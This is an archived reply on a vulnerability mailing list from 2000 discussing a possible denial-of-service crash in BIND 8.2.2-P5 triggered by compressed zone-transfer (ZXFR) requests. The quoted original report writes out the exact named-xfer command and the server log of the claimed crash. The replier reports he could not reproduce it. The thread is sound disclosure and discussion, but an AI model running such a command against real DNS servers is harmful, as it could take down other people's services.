Vulnerability Development mailing list archives
Re: Possible DOS in Bind 8.2.2-P5
From: fire-eyes <sgtphou () FIRE-EYES YI ORG>
Date: Fri, 10 Nov 2000 19:17:04 -0500
"Fabio Pietrosanti (naif)" wrote:
Hi,
playing with bind and ZXFR feature ( zone transfer compressed with a possible insecure
execlp("gzip", "gzip", NULL); ), i discovered a Denial Of Service against Bind 8.2.2-P5 .
By default Bind 8.2.2-P5 it's not compiled with ZXFR support unless you define it with #define BIND_ZXFR
so it will refuse any ZXFR transfer, because it doesn't support it.
But now what appens? Look here...
################################
zone to transfer: zone.pippo.com
dns server: dns.pippo.com 192.168.1.1
me: naif.gatesux.com 10.10.10.10
I send a Zone Trasnfer request using "-Z" switch with means that i wish to use ZXFR.
dns.pippo.com does'nt support ZXFR and have "allow-transfer{}" not configured, so everyone
could ask him for *.zone.pippo.com ...
<naif@naif> [~/bind/src822p5/bin/named-xfer] $ ./named-xfer -z zone.pippo.com -d 9 -f pics -Z dns.pippo.com
named-xfer[29297]: send AXFR query 0 to 192.168.1.1
named-xfer[29297]: premature EOF, fetching "zone.pippo.com"
On the server's log:
Nov 7 11:19:09 dns.pippo.com: named[188510]: approved ZXFR from [10.10.10.10].2284 for "zone.pippo.com"
Nov 7 11:19:09 dns.pippo.com: named[188510]: unsupported XFR (type ZXFR) of "zone.pippo.com" (IN) to
[10.10.10.10].2284
Then the server "*** CRASHED ***" .
I should assume that bind 8.2.2-P5 it's vulnerable ( Please someone test and confirm this kind of dos)
and bind-9.0.0 has no support for ZXFR .
<naif@naif> [~/bind] $ find src822p5/ -type f -exec grep -i zxfr \{\} ';' | wc -l
234
<naif@naif> [~/bind] $ find bind-9.0.0/ -type f -exec grep -i zxfr \{\} ';' | wc -l
0
A lot of DNS Server are misconfigured, and allow zone-transfer to any, so they are dossable...
naif
naif () itapac net
I tried this on my bind 8.2.2-P5 on slackware linux 7.0.0 kernel 2.2.17
Intel p200 128M ram.
I tried this in two situations:
a) named started as 'named -u nobody'
1> This results in named being run as user nobody
b) named started as 'ndc start'
1> This results in named running as root, of course.
In neither of these situations did I find any problems after 10 minutes.
If you have other ways you would like me to try running the daemon, let
me know.
Also, I am rather new at bind. How might I go about denying *XFR's from
all but approved hosts?
Thank You
Joseph
Current thread:
- Possible DOS in Bind 8.2.2-P5 Fabio Pietrosanti (naif) (Nov 08)
- Re: Possible DOS in Bind 8.2.2-P5 Przemyslaw Frasunek (Nov 08)
- Re: Possible DOS in Bind 8.2.2-P5 Fabio Pietrosanti (naif) (Nov 09)
- Re: Possible DOS in Bind 8.2.2-P5 Tomasz Grabowski (Nov 09)
- Re: Possible DOS in Bind 8.2.2-P5 Guy Cohen (Nov 09)
- Re: Possible DOS in Bind 8.2.2-P5 Mariusz Marcinkiewicz (Nov 09)
- Re: Possible DOS in Bind 8.2.2-P5 (my fault, sorry) Mariusz Marcinkiewicz (Nov 10)
- Re: Possible DOS in Bind 8.2.2-P5 Olaf Kirch (Nov 10)
- Re: Possible DOS in Bind 8.2.2-P5 Paul A Vixie (Nov 10)
- Re: Possible DOS in Bind 8.2.2-P5 Daniel Roesen (Nov 10)
- Re: Possible DOS in Bind 8.2.2-P5 fire-eyes (Nov 14)
- <Possible follow-ups>
- Re: Possible DOS in Bind 8.2.2-P5 Fernando Cardoso (Nov 09)
- Re: Possible DOS in Bind 8.2.2-P5 Luke Dudney (Nov 10)
- Re: Possible DOS in Bind 8.2.2-P5 Jonatan Sarba (Nov 14)
- Re: Possible DOS in Bind 8.2.2-P5 Peter Pentchev (Nov 15)
- Re: Possible DOS in Bind 8.2.2-P5 Johnson, Jeremiah (Nov 15)
- Re: Possible DOS in Bind 8.2.2-P5 Matt Zimmerman (Nov 15)
- Re: Possible DOS in Bind 8.2.2-P5 Peter Pentchev (Nov 15)
- Re: Possible DOS in Bind 8.2.2-P5 Paul Pot (Nov 15)
- Re: Possible DOS in Bind 8.2.2-P5 Chris Tobkin (Nov 15)
- Re: Possible DOS in Bind 8.2.2-P5 Przemyslaw Frasunek (Nov 08)
